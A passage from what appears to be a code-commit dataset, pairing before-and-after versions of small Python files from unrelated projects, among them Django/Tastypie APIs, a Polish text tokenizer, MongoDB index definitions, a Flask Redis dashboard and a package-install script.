except ImportError:
pass
# TODO: enable this import after updating MPCD to the new API
# try:
# from hoomd import mpcd
# except ImportError:
# pass
from hoomd.simulation import Simulation
from hoomd.state import State
from hoomd.operations import Operations
from hoomd.snapshot import Snapshot
from hoomd.logger import Logger
from hoomd import tuner
from hoomd._hoomd import WalltimeLimitReached;
_default_excepthook = sys.excepthook;
## \internal
# \brief Override pythons except hook to abort MPI runs
def _hoomd_sys_excepthook(type, value, traceback):
_default_excepthook(type, value, traceback);
sys.stderr.flush();
if context.current.device is not None:
_hoomd.abort_mpi(context.current.device.cpp_exec_conf);
sys.excepthook = _hoomd_sys_excepthook
__version__ = "{0}.{1}.{2}".format(*_hoomd.__version__)
| bsd-3-clause | Python |
c7ecf728e12dd3a59f4ef45e30b61ce5c52ceca5 | Fix corpus to Polish language | dhermyt/WONS | analysis/textclassification/bagofwords.py | analysis/textclassification/bagofwords.py | import functools
from nltk import ngrams
from nltk.collocations import BigramCollocationFinder
from nltk.metrics import BigramAssocMeasures
import nltk.corpus
import re
import definitions
INVALID_TOKEN_PATTERN = r'^[!%"%\*\(\)\+,&#-\.\$/\d:;\?\<\>\=@\[\]].*'
NEGATION_TOKEN_PATTERN = r'^nie$'
def get_stopwords_list():
return list(nltk.corpus.stopwords.words('polish'))
def filter_stopwords(words):
polish_stopwords = get_stopwords_list()
return [w for w in words if w not in polish_stopwords]
def filter_custom_set(words, custom_set):
r = re.compile(custom_set)
words = list(filter(lambda w: not r.match(w), words))
return words
def include_significant_bigrams(words, score_fn=BigramAssocMeasures.likelihood_ratio, n=100):
bigram_finder = BigramCollocationFinder.from_words(words)
bigrams = bigram_finder.nbest(score_fn, n)
return list(words + bigrams)
def get_all_lowercase(words):
return [x.lower() for x in words]
def get_bag_of_words(words):
return dict([(word, True) for word in words])
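# Tag every token following the Polish negation word "nie" with a _NEG suffix,
# resetting at the next punctuation-like token (INVALID_TOKEN_PATTERN).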
def mark_negations(words):
add_negation_suffix = False
r_negation = re.compile(NEGATION_TOKEN_PATTERN)
r_stopword = re.compile(INVALID_TOKEN_PATTERN)
for index, item in enumerate(words):
if (r_stopword.match(item)):
add_negation_suffix = False
continue
if (r_negation.match(item)):
add_negation_suffix = True
continue
if (add_negation_suffix):
words[index] = words[index] + "_NEG"
return words
def get_processed_bag_of_words(text, lemmatizer, settings):
words = nltk.tokenize.word_tokenize(text, 'polish')
words = get_all_lowercase(words)
if lemmatizer is not None:
words = [lemmatizer.get_lemma(word) for word in words]
if (settings.FILTER_STOPWORDS):
words = filter_stopwords(words)
words = mark_negations(words)
words = filter_custom_set(words, INVALID_TOKEN_PATTERN)
if settings.MAX_FEATURES > 0:
words = words[:settings.MAX_FEATURES]
words = functools.reduce(lambda x, y: x + y,
[words if n == 1 else list([' '.join(ngram) for ngram in ngrams(words, n)]) for n in
range(1, settings.MAX_NGRAMS + 1)])
return get_bag_of_words(words)
| import functools
from nltk import ngrams
from nltk.collocations import BigramCollocationFinder
from nltk.metrics import BigramAssocMeasures
import nltk.corpus
import re
import definitions
INVALID_TOKEN_PATTERN = r'^[!%"%\*\(\)\+,&#-\.\$/\d:;\?\<\>\=@\[\]].*'
NEGATION_TOKEN_PATTERN = r'^nie$'
def get_stopwords_list():
return list(nltk.corpus.stopwords.words('polish'))
def filter_stopwords(words):
polish_stopwords = get_stopwords_list()
return [w for w in words if w not in polish_stopwords]
def filter_custom_set(words, custom_set):
r = re.compile(custom_set)
words = list(filter(lambda w: not r.match(w), words))
return words
def include_significant_bigrams(words, score_fn=BigramAssocMeasures.likelihood_ratio, n=100):
bigram_finder = BigramCollocationFinder.from_words(words)
bigrams = bigram_finder.nbest(score_fn, n)
return list(words + bigrams)
def get_all_lowercase(words):
return [x.lower() for x in words]
def get_bag_of_words(words):
return dict([(word, True) for word in words])
def mark_negations(words):
add_negation_suffix = False
r_negation = re.compile(NEGATION_TOKEN_PATTERN)
r_stopword = re.compile(INVALID_TOKEN_PATTERN)
for index, item in enumerate(words):
if (r_stopword.match(item)):
add_negation_suffix = False
continue
if (r_negation.match(item)):
add_negation_suffix = True
continue
if (add_negation_suffix):
words[index] = words[index] + "_NEG"
return words
def get_processed_bag_of_words(text, lemmatizer, settings):
words = nltk.tokenize.word_tokenize(text)
words = get_all_lowercase(words)
if lemmatizer is not None:
words = [lemmatizer.get_lemma(word) for word in words]
if (settings.FILTER_STOPWORDS):
words = filter_stopwords(words)
words = mark_negations(words)
words = filter_custom_set(words, INVALID_TOKEN_PATTERN)
if settings.MAX_FEATURES > 0:
words = words[:settings.MAX_FEATURES]
words = functools.reduce(lambda x, y: x + y,
[words if n == 1 else list([' '.join(ngram) for ngram in ngrams(words, n)]) for n in
range(1, settings.MAX_NGRAMS + 1)])
return get_bag_of_words(words)
| bsd-2-clause | Python |
de027652a4bb12c6d1a4cb7bc85448c8c2a0d321 | use argparse to get arguments from command line | natemara/sortroms | sortroms/__main__.py | sortroms/__main__.py | from sortroms import main
import argparse
parser = argparse.ArgumentParser(
description='Sort emulator ROM files',
prog='sortroms'
)
parser.add_argument(
'folder',
metavar='DIR',
type=str,
nargs='?',
help='The ROM folder to sort.'
)
if __name__ == '__main__':
args = parser.parse_args()
main(args)
| from sortroms import main
if __name__ == '__main__':
main()
| mit | Python |
19d81520a7fe9dd8098bd1603b455f08e465c5f7 | add getspire to init | stargaser/herschel-archive | hsadownload/__init__.py | hsadownload/__init__.py |
__all__ = ['access', 'getpacs', 'getspire']
from hsadownload import access, getpacs, getspire
|
__all__ = ['access', 'getpacs']
from hsadownload import access, getpacs
| bsd-3-clause | Python |
54b40488a7b0baefba3ada33cf9b792af1c2ca4d | fix bug with api v1 | Fresnoy/kart,Fresnoy/kart | people/api.py | people/api.py | # -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from tastypie import fields
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from common.api import WebsiteResource
from .models import Artist, Staff, Organization
class UserResource(ModelResource):
class Meta:
queryset = User.objects.exclude(pk=-1) # Exclude anonymous user
detail_uri_name = 'username'
resource_name = 'people/user'
fields = ['username', 'first_name', 'last_name', 'id']
filtering = {
'first_name': ALL,
'last_name': ALL
}
def dehydrate(self, bundle):
if hasattr(bundle.obj, 'profile'):
bundle.data['photo'] = bundle.obj.profile.photo
bundle.data['birthdate'] = bundle.obj.profile.birthdate
bundle.data['birthplace'] = bundle.obj.profile.birthplace
bundle.data['cursus'] = bundle.obj.profile.cursus
bundle.data['gender'] = bundle.obj.profile.gender
# Nationality : country code separated by commas
bundle.data['nationality'] = bundle.obj.profile.nationality
bundle.data['homeland_country'] = bundle.obj.profile.homeland_country
bundle.data['birthplace_country'] = bundle.obj.profile.birthplace_country
return bundle
class ArtistResource(ModelResource):
class Meta:
queryset = Artist.objects.all()
resource_name = 'people/artist'
filtering = {
'user': ALL_WITH_RELATIONS,
'resource_uri': ALL
}
fields = ['id', 'nickname', 'bio_short_fr', 'bio_short_en',
'bio_fr', 'bio_en', 'twitter_account', 'facebook_profile']
websites = fields.ToManyField(WebsiteResource, 'websites', full=True)
user = fields.ForeignKey(UserResource, 'user', full=True)
artworks = fields.ToManyField('production.api.ArtworkResource', 'artworks',
full=False, null=True, use_in=['detail'])
class StaffResource(ModelResource):
class Meta:
queryset = Staff.objects.all()
resource_name = 'people/staff'
fields = ('user',)
user = fields.ForeignKey(UserResource, 'user', full=True)
class OrganizationResource(ModelResource):
class Meta:
queryset = Organization.objects.all()
resource_name = 'people/organization'
| # -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from tastypie import fields
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from common.api import WebsiteResource
from .models import Artist, Staff, Organization
class UserResource(ModelResource):
class Meta:
queryset = User.objects.exclude(pk=-1) # Exclude anonymous user
detail_uri_name = 'username'
resource_name = 'people/user'
fields = ['username', 'first_name', 'last_name', 'id']
filtering = {
'first_name': ALL,
'last_name': ALL
}
def dehydrate(self, bundle):
bundle.data['photo'] = bundle.obj.profile.photo
bundle.data['birthdate'] = bundle.obj.profile.birthdate
bundle.data['birthplace'] = bundle.obj.profile.birthplace
bundle.data['cursus'] = bundle.obj.profile.cursus
bundle.data['gender'] = bundle.obj.profile.gender
# Nationality : country code separated by commas
bundle.data['nationality'] = bundle.obj.profile.nationality
bundle.data['homeland_country'] = bundle.obj.profile.homeland_country
bundle.data['birthplace_country'] = bundle.obj.profile.birthplace_country
return bundle
class ArtistResource(ModelResource):
class Meta:
queryset = Artist.objects.all()
resource_name = 'people/artist'
filtering = {
'user': ALL_WITH_RELATIONS,
'resource_uri': ALL
}
fields = ['id', 'nickname', 'bio_short_fr', 'bio_short_en',
'bio_fr', 'bio_en', 'twitter_account', 'facebook_profile']
websites = fields.ToManyField(WebsiteResource, 'websites', full=True)
user = fields.ForeignKey(UserResource, 'user', full=True)
artworks = fields.ToManyField('production.api.ArtworkResource', 'artworks',
full=False, null=True, use_in=['detail'])
class StaffResource(ModelResource):
class Meta:
queryset = Staff.objects.all()
resource_name = 'people/staff'
fields = ('user',)
user = fields.ForeignKey(UserResource, 'user', full=True)
class OrganizationResource(ModelResource):
class Meta:
queryset = Organization.objects.all()
resource_name = 'people/organization'
| agpl-3.0 | Python |
59b2d0418c787066c37904816925dad15b0b45cf | Use author display name in document list_filter | yourcelf/btb,yourcelf/btb,flexpeace/btb,flexpeace/btb,yourcelf/btb,flexpeace/btb,flexpeace/btb,yourcelf/btb,flexpeace/btb,yourcelf/btb | scanblog/scanning/admin.py | scanblog/scanning/admin.py | from django.contrib import admin
from scanning.models import PendingScan, Document, DocumentPage, Scan, ScanPage, Transcription
class ScanPageInline(admin.TabularInline):
model = ScanPage
class ScanAdmin(admin.ModelAdmin):
model = Scan
inlines = [ScanPageInline]
admin.site.register(Scan, ScanAdmin)
class PendingScanAdmin(admin.ModelAdmin):
model = PendingScan
list_display = ('author', 'editor', 'code', 'created', 'completed')
search_fields = ('code',)
admin.site.register(PendingScan, PendingScanAdmin)
class DocumentAdmin(admin.ModelAdmin):
list_display = ['title', 'author', 'status', 'created']
search_fields = ['title', 'author__profile__display_name',
'body', 'transcription__revisions__body']
date_hierarchy = 'created'
list_filter = ['type', 'status', 'author__profile__managed',
'author__profile__display_name']
admin.site.register(Document, DocumentAdmin)
admin.site.register(DocumentPage)
admin.site.register(Transcription)
| from django.contrib import admin
from scanning.models import PendingScan, Document, DocumentPage, Scan, ScanPage, Transcription
class ScanPageInline(admin.TabularInline):
model = ScanPage
class ScanAdmin(admin.ModelAdmin):
model = Scan
inlines = [ScanPageInline]
admin.site.register(Scan, ScanAdmin)
class PendingScanAdmin(admin.ModelAdmin):
model = PendingScan
list_display = ('author', 'editor', 'code', 'created', 'completed')
search_fields = ('code',)
admin.site.register(PendingScan, PendingScanAdmin)
class DocumentAdmin(admin.ModelAdmin):
list_display = ['title', 'author', 'status', 'created']
search_fields = ['title', 'author__profile__display_name',
'body', 'transcription__revisions__body']
date_hierarchy = 'created'
list_filter = ['type', 'status', 'author', 'author__profile__managed']
admin.site.register(Document, DocumentAdmin)
admin.site.register(DocumentPage)
admin.site.register(Transcription)
| agpl-3.0 | Python |
3bc11eea2d629b316eb9a8bdf4d9c2a2c801ddf5 | Remove unused imports | konefalg/whylog,andrzejgorski/whylog,9livesdata/whylog,kgromadzki/whylog,epawlowska/whylog,9livesdata/whylog,epawlowska/whylog,kgromadzki/whylog,konefalg/whylog,andrzejgorski/whylog | whylog/tests/tests_front/tests_whylog_factory.py | whylog/tests/tests_front/tests_whylog_factory.py | from whylog.config.investigation_plan import LineSource
from whylog.front.whylog_factory import whylog_factory
from whylog.front.utils import FrontInput
from whylog.tests.utils import TestRemovingSettings
class TestWhylogFactory(TestRemovingSettings):
def tests_whylog_factory(self):
log_reader, teacher_generator = whylog_factory()
teacher = teacher_generator()
front_input = FrontInput(1, 'line content', LineSource('host', 'path'))
log_reader.get_causes(front_input)
teacher.add_line(0, front_input, True)
| from whylog.config.investigation_plan import LineSource
from whylog.front.whylog_factory import whylog_factory
from whylog.front.utils import FrontInput
from whylog.log_reader import LogReader
from whylog.teacher import Teacher
from whylog.tests.utils import TestRemovingSettings
class TestWhylogFactory(TestRemovingSettings):
def tests_whylog_factory(self):
log_reader, teacher_generator = whylog_factory()
teacher = teacher_generator()
front_input = FrontInput(1, 'line content', LineSource('host', 'path'))
log_reader.get_causes(front_input)
teacher.add_line(0, front_input, True)
| bsd-3-clause | Python |
b875084e74ee03c6b251a79f04f0db340bb356b8 | Fix #604 | Clinical-Genomics/scout,Clinical-Genomics/scout,Clinical-Genomics/scout | scout/constants/indexes.py | scout/constants/indexes.py | from pymongo import (IndexModel, ASCENDING, DESCENDING)
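# MongoDB index definitions keyed by collection name; each IndexModel lists its compound keys and a readable name.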
INDEXES = {
'hgnc_collection': [
IndexModel([
('build', ASCENDING),
('chromosome', ASCENDING)],
name="build_chromosome"),
],
'variant_collection': [
IndexModel([
('case_id', ASCENDING),
('rank_score', DESCENDING)],
name="caseid_rankscore"),
IndexModel([
('case_id', ASCENDING),
('variant_rank', ASCENDING)],
name="caseid_variantrank"),
IndexModel([
('case_id', ASCENDING),
('category', ASCENDING),
('variant_type', ASCENDING),
('rank_score', DESCENDING)],
name="caseid_category_varianttype_rankscore"),
IndexModel([
('case_id', ASCENDING),
('variant_id', ASCENDING)],
name="caseid_variantid"),
IndexModel([
('case_id', ASCENDING),
('variant_type', ASCENDING),
('variant_rank', ASCENDING),
('panels', ASCENDING),
('thousand_genomes_frequency', ASCENDING)],
name="caseid_varianttype_variantrank_panels_thousandg")
],
}
| from pymongo import (IndexModel, ASCENDING, DESCENDING)
INDEXES = {
'hgnc_collection': [IndexModel(
[('build', ASCENDING), ('chromosome', ASCENDING)], name="build_chromosome"),
],
'variant_collection': [
IndexModel([('case_id', ASCENDING),('rank_score', DESCENDING)], name="caseid_rankscore"),
IndexModel([('case_id', ASCENDING),('variant_rank', ASCENDING)], name="caseid_variantrank")
]
}
| bsd-3-clause | Python |
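A hedged sketch of applying IndexModel definitions like the ones above in a single round trip; the host, database, and collection names are illustrative and assume a MongoDB reachable on localhost:
from pymongo import MongoClient, IndexModel, ASCENDING, DESCENDING
client = MongoClient('localhost', 27017)
variants = client['scout-demo']['variant']  # illustrative names
# create_indexes builds several named compound indexes in one call.
variants.create_indexes([
    IndexModel([('case_id', ASCENDING), ('rank_score', DESCENDING)],
               name='caseid_rankscore'),
    IndexModel([('case_id', ASCENDING), ('variant_id', ASCENDING)],
               name='caseid_variantid'),
])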
87371774ad332a3adbe927e2609d73710f4a7678 | change method name | vangj/py-bbn,vangj/py-bbn | tests/graph/test_dag.py | tests/graph/test_dag.py | from pybbn.graph.edge import Edge, EdgeType
from pybbn.graph.node import Node
from pybbn.graph.dag import Dag
from nose import with_setup
def setup():
pass
def teardown():
pass
@with_setup(setup, teardown)
def test_dag_creation():
n0 = Node(0)
n1 = Node(1)
n2 = Node(2)
e0 = Edge(n0, n1, EdgeType.DIRECTED)
e1 = Edge(n1, n2, EdgeType.DIRECTED)
e2 = Edge(n2, n0, EdgeType.DIRECTED)
g = Dag()
g.add_node(n0)
g.add_node(n1)
g.add_edge(e0)
g.add_edge(e1)
g.add_edge(e2)
print(g)
assert len(g.get_nodes()) == 3
assert len(g.get_edges()) == 2
assert len(list(g.get_neighbors(0))) == 1
assert len(list(g.get_neighbors(1))) == 2
assert len(list(g.get_neighbors(2))) == 1
assert 1 in g.get_neighbors(0)
assert 0 in g.get_neighbors(1)
assert 2 in g.get_neighbors(1)
assert 1 in g.get_neighbors(2)
assert g.edge_exists(0, 1) == 1
assert g.edge_exists(1, 2) == 1
assert g.edge_exists(0, 2) == 0
assert len(g.get_parents(0)) == 0
assert len(g.get_parents(1)) == 1
assert len(g.get_parents(2)) == 1
assert 0 in g.get_parents(1)
assert 1 in g.get_parents(2)
assert len(g.get_children(0)) == 1
assert len(g.get_children(1)) == 1
assert len(g.get_children(2)) == 0
assert 1 in g.get_children(0)
assert 2 in g.get_children(1)
| from pybbn.graph.edge import Edge, EdgeType
from pybbn.graph.node import Node
from pybbn.graph.dag import Dag
from nose import with_setup
def setup():
pass
def teardown():
pass
@with_setup(setup, teardown)
def test_graph_creation():
n0 = Node(0)
n1 = Node(1)
n2 = Node(2)
e0 = Edge(n0, n1, EdgeType.DIRECTED)
e1 = Edge(n1, n2, EdgeType.DIRECTED)
e2 = Edge(n2, n0, EdgeType.DIRECTED)
g = Dag()
g.add_node(n0)
g.add_node(n1)
g.add_edge(e0)
g.add_edge(e1)
g.add_edge(e2)
print(g)
assert len(g.get_nodes()) == 3
assert len(g.get_edges()) == 2
assert len(list(g.get_neighbors(0))) == 1
assert len(list(g.get_neighbors(1))) == 2
assert len(list(g.get_neighbors(2))) == 1
assert 1 in g.get_neighbors(0)
assert 0 in g.get_neighbors(1)
assert 2 in g.get_neighbors(1)
assert 1 in g.get_neighbors(2)
assert g.edge_exists(0, 1) == 1
assert g.edge_exists(1, 2) == 1
assert g.edge_exists(0, 2) == 0
assert len(g.get_parents(0)) == 0
assert len(g.get_parents(1)) == 1
assert len(g.get_parents(2)) == 1
assert 0 in g.get_parents(1)
assert 1 in g.get_parents(2)
assert len(g.get_children(0)) == 1
assert len(g.get_children(1)) == 1
assert len(g.get_children(2)) == 0
assert 1 in g.get_children(0)
assert 2 in g.get_children(1)
| apache-2.0 | Python |
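The renamed test adds three directed edges but asserts only two survive: a DAG container must drop the 2 -> 0 edge that would close the cycle 0 -> 1 -> 2 -> 0. A minimal reachability check of the kind such a container might run (illustrative only, not py-bbn's actual code):
def creates_cycle(adjacency, start, target):
    # True if `target` can already reach `start`, so start -> target cycles.
    stack, seen = [target], set()
    while stack:
        node = stack.pop()
        if node == start:
            return True
        if node not in seen:
            seen.add(node)
            stack.extend(adjacency.get(node, ()))
    return False
adj = {0: [1], 1: [2]}
print(creates_cycle(adj, 2, 0))  # True: 2 -> 0 would close 0 -> 1 -> 2 -> 0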
e4e10ee0ae5a18cfec0e15b7b85986b7f4fc4f9d | Fix prefetched fields in Institutions in API | watchdogpolska/feder,watchdogpolska/feder,watchdogpolska/feder,watchdogpolska/feder | feder/institutions/viewsets.py | feder/institutions/viewsets.py | import django_filters
from rest_framework import filters, viewsets
from teryt_tree.rest_framework_ext.viewsets import custom_area_filter
from .models import Institution, Tag
from .serializers import InstitutionSerializer, TagSerializer
class InstitutionFilter(filters.FilterSet):
jst = django_filters.CharFilter(method=custom_area_filter)
def __init__(self, *args, **kwargs):
super(InstitutionFilter, self).__init__(*args, **kwargs)
self.filters['name'].lookup_expr = 'icontains'
class Meta:
model = Institution
fields = ['name', 'tags', 'jst', 'regon']
class InstitutionViewSet(viewsets.ModelViewSet):
queryset = (Institution.objects.
select_related('jst').
prefetch_related('tags','parents').
all())
serializer_class = InstitutionSerializer
filter_backends = (filters.DjangoFilterBackend,)
filter_class = InstitutionFilter
class TagViewSet(viewsets.ModelViewSet):
queryset = Tag.objects.all()
serializer_class = TagSerializer
| import django_filters
from rest_framework import filters, viewsets
from teryt_tree.rest_framework_ext.viewsets import custom_area_filter
from .models import Institution, Tag
from .serializers import InstitutionSerializer, TagSerializer
class InstitutionFilter(filters.FilterSet):
jst = django_filters.CharFilter(method=custom_area_filter)
def __init__(self, *args, **kwargs):
super(InstitutionFilter, self).__init__(*args, **kwargs)
self.filters['name'].lookup_expr = 'icontains'
class Meta:
model = Institution
fields = ['name', 'tags', 'jst', 'regon']
class InstitutionViewSet(viewsets.ModelViewSet):
queryset = (Institution.objects.
select_related('jst').
prefetch_related('tags').
all())
serializer_class = InstitutionSerializer
filter_backends = (filters.DjangoFilterBackend,)
filter_class = InstitutionFilter
class TagViewSet(viewsets.ModelViewSet):
queryset = Tag.objects.all()
serializer_class = TagSerializer
| mit | Python |
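The fix matters because prefetch_related only batches the relations it is told about, and naming a relation the model lacks (here 'parents') breaks the queryset. A sketch of the select/prefetch split, with Institution standing for the model imported in the module above:
# select_related joins foreign-key rows in SQL; prefetch_related batches
# many-to-many rows into one extra query.
qs = (Institution.objects
      .select_related('jst')        # foreign key: fetched via SQL JOIN
      .prefetch_related('tags'))    # many-to-many: one extra batched query
for institution in qs:
    institution.jst                 # no additional query
    list(institution.tags.all())    # served from the prefetch cache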
9bdaf963843a9f0b44487ea3b258b50b328153d8 | Remove redis connection logic from each view, make it global, keep it threadsafe | gmcquillan/firetower,gmcquillan/firetower | firetower/web/firetower_web.py | firetower/web/firetower_web.py | from calendar import timegm
import datetime
import time
from flask import Flask, render_template
from firetower import redis_util
REDIS_HOST = "localhost"
REDIS_PORT = 6379
REDIS = redis_util.Redis(REDIS_HOST, REDIS_PORT)
app = Flask(__name__)
def timestamp(dttm):
return timegm(dttm.utctimetuple())
@app.route("/")
def root():
lines = []
categories = REDIS.get_categories()
for cat in categories:
lines.append("<li>%s</li>" % cat)
return "<ul>%s</ul>" % "\n".join(lines)
@app.route("/default/")
def default():
cat_dict = REDIS.conn.hgetall("category_ids")
end = datetime.datetime.now()
start = end - datetime.timedelta(hours=1)
results = []
for cat_id in cat_dict:
cat = cat_dict[cat_id]
time_series = REDIS.get_timeseries(cat, timestamp(start), timestamp(end))
items = [(int(x)*1000, int(y)) for x,y in time_series.items()]
items.sort(lambda x,y: cmp(x[0], y[0]))
results.append(
(cat_id, cat, items)
)
return render_template(
"last_5_index.html", categories = cat_dict.items(), results = results
)
@app.route("/aggregate")
def aggregate():
cat_dict = REDIS.conn.hgetall("category_ids")
start = end - 300
error_totals = {}
for cat_id in cat_dict:
cat = cat_dict[cat_id]
time_series = REDIS.get_timeseries(cat, start, end)
for time_point in time_series:
error_totals[cat_id] = error_totals.get(cat_id, 0) + int(time_point[1])
totals = []
print error_totals
for i in error_totals.items():
totals.append((i[0], cat_dict[i[0]], i[1]))
return render_template(
"aggregate.html", totals = totals)
def main():
app.run(debug=True, use_evalex=False, host='0.0.0.0')
| from calendar import timegm
import datetime
import time
from flask import Flask, render_template
from firetower import redis_util
REDIS_HOST = "localhost"
REDIS_PORT = 6379
app = Flask(__name__)
def timestamp(dttm):
return timegm(dttm.utctimetuple())
@app.route("/")
def root():
lines = []
redis = redis_util.Redis(REDIS_HOST, REDIS_PORT)
categories = redis.get_categories()
for cat in categories:
lines.append("<li>%s</li>" % cat)
return "<ul>%s</ul>" % "\n".join(lines)
@app.route("/default/")
def default():
redis = redis_util.Redis(REDIS_HOST, REDIS_PORT)
cat_dict = redis.conn.hgetall("category_ids")
end = datetime.datetime.now()
start = end - datetime.timedelta(hours=1)
results = []
for cat_id in cat_dict:
cat = cat_dict[cat_id]
time_series = redis.get_timeseries(cat, timestamp(start), timestamp(end))
items = [(int(x)*1000, int(y)) for x,y in time_series.items()]
items.sort(lambda x,y: cmp(x[0], y[0]))
results.append(
(cat_id, cat, items)
)
return render_template(
"last_5_index.html", categories = cat_dict.items(), results = results
)
@app.route("/aggregate")
def aggregate():
redis = redis_util.Redis(REDIS_HOST, REDIS_PORT)
cat_dict = redis.conn.hgetall("category_ids")
start = end - 300
error_totals = {}
for cat_id in cat_dict:
cat = cat_dict[cat_id]
time_series = redis.get_timeseries(cat, start, end)
for time_point in time_series:
error_totals[cat_id] = error_totals.get(cat_id, 0) + int(time_point[1])
totals = []
print error_totals
for i in error_totals.items():
totals.append((i[0], cat_dict[i[0]], i[1]))
return render_template(
"aggregate.html", totals = totals)
def main():
app.run(debug=True, use_evalex=False, host='0.0.0.0')
| mit | Python |
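The commit is safe because redis-py clients wrap a thread-safe connection pool, so one module-level client can serve every request handler. A hedged minimal sketch of the pattern, assuming a Redis server on localhost:
import redis
from flask import Flask
app = Flask(__name__)
# Created once at import time and shared; each command borrows a pooled
# connection and returns it when done.
REDIS = redis.Redis(host='localhost', port=6379)
@app.route('/hits')
def hits():
    return str(REDIS.incr('hits'))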
1c48f9ad2c2a66d7c15c9216665b7f802d3498b4 | Set deprecation_summary_result so we can summarize deprecations and they get written to the report plist if specified. | autopkg/gregneagle-recipes | SharedProcessors/DeprecationWarning.py | SharedProcessors/DeprecationWarning.py | #!/usr/bin/python
#
# Copyright 2019 Greg Neagle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Processor that outputs a warning message. Intended to alert recipe users of
upcoming removal of a recipe."""
import os
from autopkglib import Processor
__all__ = ["DeprecationWarning"]
class DeprecationWarning(Processor):
"""This processor outputs a warning that the recipe has been deprecated."""
input_variables = {
"warning_message": {
"required": False,
"description": "Warning message to output.",
},
}
output_variables = {
"deprecation_summary_result": {
"description": "Description of interesting results."
}
}
description = __doc__
def main(self):
warning_message = self.env.get(
"warning_message",
"### This recipe has been deprecated. It may be removed soon. ###"
)
self.output(warning_message)
recipe_name = os.path.basename(self.env['RECIPE_PATH'])
if recipe_name.endswith('.recipe'):
recipe_name = os.path.splitext(recipe_name)[0]
self.env["deprecation_summary_result"] = {
'summary_text': 'The following recipes have deprecation warnings:',
'report_fields': ['name', 'warning'],
'data': {
'name': recipe_name,
'warning': warning_message
}
}
if __name__ == '__main__':
PROCESSOR = DeprecationWarning()
PROCESSOR.execute_shell()
| #!/usr/bin/python
#
# Copyright 2019 Greg Neagle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Processor that outputs a warning message. Intended to alert recipe users of
upcoming removal of a recipe."""
from autopkglib import Processor
__all__ = ["DeprecationWarning"]
class DeprecationWarning(Processor):
"""This processor outputs a warning that the recipe has been deprecated."""
input_variables = {
"warning_message": {
"required": False,
"description": "Warning message to output.",
},
}
output_variables = {
}
description = __doc__
def main(self):
warning_message = self.env.get(
"warning_message",
"### This recipe has been deprecated. It may be removed soon. ###"
)
self.output(warning_message, verbose_level=0)
if __name__ == '__main__':
PROCESSOR = DeprecationWarning()
PROCESSOR.execute_shell()
| apache-2.0 | Python |
1e139567767a98914df90ec152d543bb8bfde38c | add test | dtnewman/zappa_boilerplate,dtnewman/zappa_boilerplate | basic_zappa_project/public/views_tests.py | basic_zappa_project/public/views_tests.py | from basic_zappa_project.test_utils import BaseTestCase
class TestViews(BaseTestCase):
def test_status(self):
expected = {'status': 'ok'}
response = self.client.get('/status')
self.assert200(response)
self.assertEqual(response.json, expected)
def test_about(self):
response = self.client.get('/about')
self.assert200(response)
def test_home_get(self):
response = self.client.get('/')
self.assert200(response)
def test_register_get(self):
response = self.client.get('/register')
self.assert200(response)
| from basic_zappa_project.test_utils import BaseTestCase
class TestViews(BaseTestCase):
def test_status(self):
expected = {'status': 'ok'}
response = self.client.get('/status')
self.assert200(response)
self.assertEqual(response.json, expected)
def test_about(self):
response = self.client.get('/about')
self.assert200(response)
def test_home_get(self):
response = self.client.get('/')
self.assert200(response)
| mit | Python |
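The same checks can be written without Flask-Testing by using Flask's built-in test client; the create_app import below is a hypothetical application factory, not the project's actual layout:
import pytest
from basic_zappa_project.app import create_app  # hypothetical import path
@pytest.fixture
def client():
    app = create_app()
    app.config['TESTING'] = True
    return app.test_client()
def test_status(client):
    response = client.get('/status')
    assert response.status_code == 200
    assert response.get_json() == {'status': 'ok'}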
a82fc92938a647de620cf8a96fd5907c08060c32 | fix mistake | sagemathinc/learntheeasyway,sagemathinc/learntheeasyway,sagemathinc/learntheeasyway,sagemathinc/learntheeasyway | scripts/install/install.py | scripts/install/install.py | import os
import subprocess
import os.path
def apt_get_install(fname):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo apt-get install -y %s' % (item))
def npm_global_install(fname):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo npm -g install %s' % (item))
def pip_install(fname):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo pip install %s' % (item))
def cmd_exists(cmd):
# this is from http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
functions_to_handle_requirements = {}
functions_to_handle_requirements['apt_get'] = apt_get_install
functions_to_handle_requirements['npm'] = npm_global_install
functions_to_handle_requirements['pip'] = pip_install
order_of_files_to_handle = ['apt_get_requirements.txt', 'npm_requirements.txt', 'pip_requirements.txt']
for fname in order_of_files_to_handle:
if os.path.isfile(fname):
# assume fname endswith _requirements.txt
l = len('_requirements.txt')
fname_first_part = fname[:-l]
functions_to_handle_requirements[fname_first_part](fname) | import os
import subprocess
import os.path
def apt_get_install(what):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo apt-get install -y %s' % (item))
def npm_global_install(what):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo npm -g install %s' % (item))
def pip_install(what):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo pip install %s' % (item))
def cmd_exists(cmd):
# this is from http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
functions_to_handle_requirements = {}
functions_to_handle_requirements['apt_get'] = apt_get_install
functions_to_handle_requirements['npm'] = npm_global_install
functions_to_handle_requirements['pip'] = pip_install
